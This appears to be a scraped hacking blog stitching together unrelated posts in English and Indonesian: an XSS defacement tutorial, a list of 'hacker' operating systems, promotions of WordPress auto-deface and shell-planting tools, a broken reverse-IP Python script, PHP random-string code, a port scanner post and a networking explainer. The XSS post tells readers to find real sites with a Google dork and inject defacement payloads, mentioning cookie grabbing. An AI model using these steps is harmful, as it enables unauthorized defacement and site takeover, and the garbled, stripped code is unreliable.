error.php XSS (Cross Site Scripting) Vulnerabilities 2016

Title : error.php XSS 

Risk : Cross site scripting, cookie Grabbing 
Poc : error.php?error=
Dork : "inurl:error.php?error="
Author : Minhal Mehdi (
browser : Mozilla Firefox 

1). Go to Google and now type the dork "inurl:error.php?error="
in search results ignore all the extra results with different URL Like : error-php-error.php
pick site with url Only..

2). Now Type your first Tag to Check the vulnerability 
example :<h1>Test</h1>
if it will show you "Test" word in Header tag this Its Vulnerable

Here are few ways in you you can inject your xss vector :) ..

How To show Header XSS injection:<h1>Hacked</h1>

To show header in center XSS injection:<center><h1>Hacked</h1></center>

How to show Title XSS injection:<title>Hacked</title>

How to Add a Image XSS injection:<img src=""/>

How to add a Message XSS injection<p><b>Your Message Here<b></p>

How to write message in next lines XSS injection:<p><b>First line<br>Second Line <b></p> 

How To add a scrolling Text XSS injection:<marquee>Scrolling text Here</marquee>

How To Add a alert box XSS injection:<script>alert("hello");</script>

How To add background colour in page XSS injection:<body bgcolor="red"/>

How to Add a full deface Page XSS injection:<title>Hacked</title><center><h1>hacked<h1><body bgcolor="red"/><p><b>You have been Hacked<br></b></p><img src=""/>

you can add more html and javscript tags here,
here is another demo site :<center><h1></h1></center>
find More website with dorks :)

if you have any queries feel free to comment below :)

Top 5 "Hacker" Friendly Operating Systems

Top 5 "Hacker" Friendly Operating Systems :Hello Everyone !! Most of my readers asked me Which is The Best Operating System for Doing Hacking Activities, such as Hacking websites, Wireless Networks, Passwords, Network Sniffing ,reverse engineering, application hacking and other encrypting and spoofing hacking. So I thought of writing an article on this... Today In this article I will be sharing some informations about awesome Hacking Operating Systems (OS) ;) ...

Here is the list of Top 5 Hacker Friendly Operating Systems about which we are going to discuss.. 
  1. Kali Linux
  2. Backtrck 5
  3. BugTraq
  4. BlackBuntu
  5. DEFT

So lets come to our topic Top 5 Hacker Friendly Operating Systems. Below is the full list of top 5 Hacker friendly operating systems. If you are a Hacker you can use them and if not them can be by using them ;) .. so here it starts! ...

#1 Kali Linux

Kali Linux is based upon Debian Linux, rather than Ubuntu and new streamlined storehouses synchronize with the Debian vaults 4 times each day, continually furnishing clients with the most recent bundle upgrades and security fixes accessible.

With more than 300 penetration testing tools, totally free, Open source, Vast wireless gadget support, GPG marked bundles and repos, Multi-dialect, Completely adaptable make this appropriation one of the best accessible gem of hacking group.

You can Donload Kali Linux From the link given below :)

NOTE: Default root password is same "root" :)

#2 BackTrack 5

Backtrack is a Linux OS intended for security experts. Who manages framework and web application security and different fields, for example, cyber crime scene investigation.

This Operating System includes all the security evaluations and elements till date.This distro got it all,Slick Interface,Powerful yet most recent tools,high perfectly substantial programming library,tons of instructional exercise. 

You can download Backtrack from below link.!

BugTraq offers the most exhaustive dispersion, ideal, steady and programmed security to date. Bugtraq is an appropriation in light of the 2.6.38 part has an extensive variety of infiltration and legal apparatuses. Bugtraq can introduce from a Live DVD or USB drive, the circulation is tweaked to the last bundle, designed and redesigned the portion and the part has been fixed for better execution and to perceive an assortment of equipment, including remote infusion patches pentesting different disseminations don't perceive.

Administrative improvements of the system for better management of services. Extended the scope of acknowledgment for infusion remote drivers. Tools perfectly configured, automated installation scripts and tools like Nessus, OpenVAS, Greenbone, Nod32, Hashcat, Avira, BitDefender, ClamAV, Avast, AVG, etc...

Awesome Scripts from Bugtraq-Team (SVN upgrades devices, erase tracks, indirect accesses, Spyder-sql, and so on.) Stability and performance optimized: Enhanced execution blaze and java and begin cleansing superfluous administrations. So that the client can utilize just the administrations you truly need.  It has consolidated the formation of the client in the establishment, which is made with all framework designs.

4# BlackBuntu

Blackbuntu is dispersion for infiltration testing which was extraordinarily intended for security preparing understudies and professionals of data security. It's presently being assembled utilizing the xubuntu 12.04.This release has an extensive programming library and almost 100000's instructional exercises flying on YouTube and different locales. Blackbuntu keeps running on any PC,new or old,because of its less requirements.The Main developer,Krit Kadnok says "It's made time permitting as a hobby."Get Blackbuntu Here

#5 DEFT (Digital Evidence & Forensic Toolkit.)

DEFT (acronym for Digital Evidence and Forensic Toolkit) is a Xubuntu Linux-based Computer Forensics live CD. It is intended to meet police, agents, framework director and Computer Forensics authority's requirements.

DEFT Linux v5 depends on the new Kernel 2.6.31 (Linux side) and the DEFT Extra 2.0 (Computer Forensic GUI) with the best freeware Windows Computer Forensic instruments. DEFT it's another idea of Computer Forensic live framework that utilization LXDE as desktop environment and thunar document administrator and mount director as instrument for gadget administration.

It is a simple to utilize framework that incorporates an incredible equipment identification and the best free and open source applications committed to episode reaction and PC crime scene investigation.

DEFT is intended to be utilized by:
  • police 
  • examiners 
  • framework executive 
  • people 

and every one of the general population who need to utilize criminological instrument yet don't have the foggiest idea about the open source agent frameworks and the Forensic methods. Get This Swiss Knife of PC world Here

Config and Auto Deface in Worpdress

Config and Auto Deface in Wordpress..

ngk usah capek2 untuk nyari config + masuk ke database, ganti u\p admin, login, nanem shell, deface..

karena semua fitur itu ada di tool ini..
cuma 1x klik...

ganti $nick.

klo token ngk ada.. berarti tinggalin aja..
klo token ada + ngk berhasil mepes.. coba lu pake manual..
Script Auto Reverse IP Lookup With Python

Hai sob ...
Kali ini ane mau bagi script Auto Reverse IP Lookup With Python , jika pake web kan udah biasa tuh gimana kalau pakai script python kan luar biasa :p wkwkw  . Okey lanjut saja ..

Berikut Script nya

import urllib2
import re
import random

#Decoded by DayWalker
#Concat : rafsanzani.suhada99[at]gmail[dot]com
# Target : <-- Target 

class reverse(object):
def run(self, target):
print ""
if target.startswith("http://"):
target = target.replace("http://", "")
elif target.startswith("https://"):
target = target.replace("https://", "")

url = "" % (target)

opener = urllib2.build_opener()
opener.addheaders = [('User-agent','Mozilla/5.0 (Mobile; rv:14.0) Gecko/14.0 Firefox/14.0')]
response =
data =
comp = re.compile("<tr><td>\S+</td><td")
baglantilar = comp.findall(data)

for i in baglantilar:
i = i.replace("<tr><td>", "").replace("</td><td", "")

if i.startswith("http://"):
i = "http://"+i

if "Domain" not in i:
print i

print "Something's went wrong .."

if __name__ == '__main__':
a = raw_input("\n\t Target : ")

print "\n IndoXploit Coders Team"
# Indoxploit Coders Team

SS testing :

Oke Terima kasih :)

Thx To : IndoXploit Coders Team | IDN-Crew | Madura Cyber Team |
Tutorial Generate Random String menggunakan PHP Script

Kali ini saya akan share cara membuat random string menggunakan bahasa php. Random string biasa digunakan untuk membuat kode kupn, konfirmasi, random password dll. Oke langsung saja ke tutorial.

1. Random String Berisikan Huruf Kecil dan Angka.

function random_string()
    $character_set_array = array();
    $character_set_array[] = array('count' => 7, 'characters' => 'abcdefghijklmnopqrstuvwxyz');
    $character_set_array[] = array('count' => 1, 'characters' => '0123456789');
    $temp_array = array();
    foreach ($character_set_array as $character_set) {
        for ($i = 0; $i < $character_set['count']; $i++) {
            $temp_array[] = $character_set['characters'][rand(0, strlen($character_set['characters']) - 1)];
    return implode('', $temp_array);
Simpan file tersebut dengan nama random.php .
Selanjutnya buat file lain dengan nama call.php dan isikan kode berikut :
include "random.php";
   $random = random_string(0);
 print ("$random");

Cara panggilnya :
via terminal linux bisa ketikkan php call.php
Atau bisa juga di run lewat localhost.
Contoh output : rpca6unz
Terdiri dari 8 karakter dengan 7 huruf kecil dan 1 angka.
2. Random String Berisikan Huruf Kecil, Huruf besar, Simbol, dan Angka.
function random_string()
    $character_set_array = array();
    $character_set_array[] = array('count' => 5, 'characters' => 'abcdefghijklmnopqrstuvwxyz');
    $character_set_array[] = array('count' => 3, 'characters' => 'ABCDEFGHIJKLMNOPQRSTUVWXYZ');
    $character_set_array[] = array('count' => 2, 'characters' => '0123456789');
    $character_set_array[] = array('count' => 2, 'characters' => '!@#$+-*&?:');
    $temp_array = array();
    foreach ($character_set_array as $character_set) {
        for ($i = 0; $i < $character_set['count']; $i++) {
            $temp_array[] = $character_set['characters'][rand(0, strlen($character_set['characters']) - 1)];
    return implode('', $temp_array);
Simpan dengan mana random.php lalu buat file call.php seperti nomor 1.
Contoh Output : q#Q?w22kaZfC
Terdiri dari 12 karakter dengan 5 huruf kecil, 3 huruf besar, 2 angka, dan 2 simbol.
Mudah bukan ?
Script diatas masih bisa dikembangkan sesuai kebutuhan, misal output hanya berupa simbol dan angka, huruf besar dan angka, dll.

Sekian tutor kali ini dan semoga bermanfaat.

Credit : Linux and Security
Cara Melihat Port Web Yang Terbuka Dengan PortScanner (Perl)

Hai Sob..
Kali ini saya akan share cara melihat port web yang terbuka dengan PortScanner (Perl) , Apa sih fungsinya ? kalau menurut saya sih fungsi nya kita bsa melihat port yang terbuka , contoh port 22 ? nah ini port 22 itu SSH , jadi kita bisa meromote web itu dengan ssh , ada juga yang 23 21 dll .


Pada bagian :
$ip = "localhost" ganti localhost dengan website(target) 

Ini hasil nya : 

Untuk ingin mengetahui nama nama portnya search aja ke google :p
Spannig Tree Protocol (IEEE 802.1d)

Pengertian Spanning Tree Protocol (STP)
Pengertian Spanning Tree Protocol (STP) sesuai dengan fungsi dari STP itu sendiri, yaitu dengan tugas utamanya untuk mencegah terjadinya network loops yang terjadi pada layer 2 (device Switch maupun Bridge). STP dengan konstan selalu memonitoring network untuk menemukan links dan memastikan supaya tidak terjadi loops dengan menutup links yang redundant (berlebihan).

Spanning Tree Protocol Operation
STP Konsep
  • STP menemukan semua links pada network dan menutup links yang redundant. STP benar-benar memastikan/mencegah terjadinya network loops dengan memilih salah satu Switch sebagai root-bridge. Root-bridge port dinamakan designated port (Forwarding-state port). Forwarding-state port bertugas menerima dan mengirim (meneruskan) traffic.
  • Setelah salah satu switch ditentukan sebagai root-bridge maka yang lain bertindak sebagai non-root bridge. (lihat gambar diatas)
  • Kemudian port (yang berada di switch non-root bridge) yang mempunyai nilai cost terkecil (yang ditentukan oleh bandwidth link) dan terhubung ke port root-bridge (designated port) dinamakan root port (juga bertugas meneruskan traffic).
  • Port yang telah ditentukan dan memiliki nilai path-cost paling kecil ke root-bridge dinamakan designated port. Port lain atau port yang berada di jalur yang sama dianggap non-designated (tidak meneruskan traffic) dan dinamakan blocking mode. (lihat gambar diatas)
Memilih Root Bridge
Switch maupun Bridge menjalankan pertukaran informasi STP dengan BPDUs (Bridge Protocol Data Units). BPDUs mengirim pesan konfigurasi menggunakan multicast frame. Bridge ID dari setiap device mengirim ke device lainya menggunakan BPDUs. 

Bridge ID digunakan untuk menentukan Root-bridge dan Root-port. Bridge ID panjangnya 8-byte didalamnya termasuk priority dan MAC address dari masing-masing device.

Untuk menentukan Root-bridge, priority dan MAC address device digabung. Jika kedua switch mempunyai nilai priority yang sama, maka MAC address lah yang digunakan untuk menentukan, yaitu dengan memilih salah satu switch yang mempunyai nilai ID MAC yang paling kecil.
Contoh: Pada topologi ada dua buah switch, masing-masing memiliki identitas SW 1 dan SW2. Keduanya memiliki priority yang sama yaitu 32768, maka untuk menentukan root-bridge kita menggunakan MAC Address. Disini SW1 memiliki nilai MAC address: 0000.0c00.1111.1111 dan SW2 nilai MAC addressnya: 0000.0c00.2222.2222 . Maka yang bertindak sebagai root-bridge adalah SW1 karena memiliki nilai ID MAC yang lebih kecil daripada SW2.
Memilih Designated Port
Untuk menentukan port yang akan digunakan untuk komunikasi dengan root-bridge, terlebih dahulu kita harus mengetahui apa itu path-cost. STP cost merupakan total akumulasi path-cost berdasarkan pada bandwidth pada links. Untuk menentukan designated port silahkan baca lagi pada penjelasan diatas. 

Cost STP

Spanning-Tree Port States
Port pada switch maupun bridge menjalankan STP transisi melalui 4 states yang berbeda:
  1. Blocking maksudnya tidak mem-forward frames. Semua port switch blocking state secara  default ketika switch hidup.
  2. Listening maksudnya listen BPDUs untuk memastikan tidak ada loop pada network sebelum melewati data frames.
  3. Learning maksudnya learn MAC addresses dan membuat tabel filter tetapi tidak mem-forward frames.
  4. Forwarding maksudnya mengirim dan menerima semua data pada bridged port.
Biasanya, port switch itu menggunakan blocking dan forwarding states. Forwarding port ditentukan yang mana port tersebut mempunyai nilai cost terkecil ke root-bridge. Namun. jika topologi jaringanya berubah karena dari salah satu link switch failed (gagal) atau pihak administrator menambahkan switch pada topologi tersebut maka port switch akan melakukan listening dan learning states.

Blocking ports digunakan untuk mencegah terjadinya loop pada network. Kadang sebuah switch menentukan best-path ke root-bridge, kemudian semua port lain akan blocking states hingga port yang ter-blocking states menerima BPDUs.

Jika sebuah switch menentukan bahwa port ter-blocking states maka harus ada yang menjadi designated port, kemudian switch akan melakukan listening state. Setelah itu switch akan mengecek BPDUs untuk memastikan bahwa switch tidak membuat sebuah loop sesekali port forwarding states.

Convergence terjadi ketika switch/bridge teralihkan dari forwarding atau blocking states lain. Tidak ada data yang di forward selama kejadian ini. Convergence penting untuk memastikan semua device mempunyai database yang sama. Sebelum data di forward, semua device harus telah ter-upadted. Kejadian ini membutuhkan waktu 50 detik, dari blocking hingga forwarding states. Direkomendasikan untuk tidak mengubah default timer STP (tetapi timer bisa disesuaikan jika perlu).
Forward delay adalah waktu untuk mengalihkan sebuah port dari listening atau dari learning ke Forward states.

STP Example

Auto Edit user and Deface in Wordpress.

Auto Edit user and Deface in Wordpress.

setelah kemaren versi joomla dan Balitbang.
sekarang ane pengen share versi wordpress..

tool ini untuk mempermudah kita saat dapat configs.
karena kita ngk perlu nyelem ke database, ganti u\p, login, nanem shell, dan deface...

karena semua fitur itu ada di tool ini..

bahan bahan:
wp.php ->



- form "Hacked By Tu5b0l3d" ganti dengan "Hacked by Nick_ente"
- ini ngk upload shell, cuma upload uploader.
- fitur system() harus enabled.

sorry kalo Videonya yg versi 1, beda tipis doang kok..

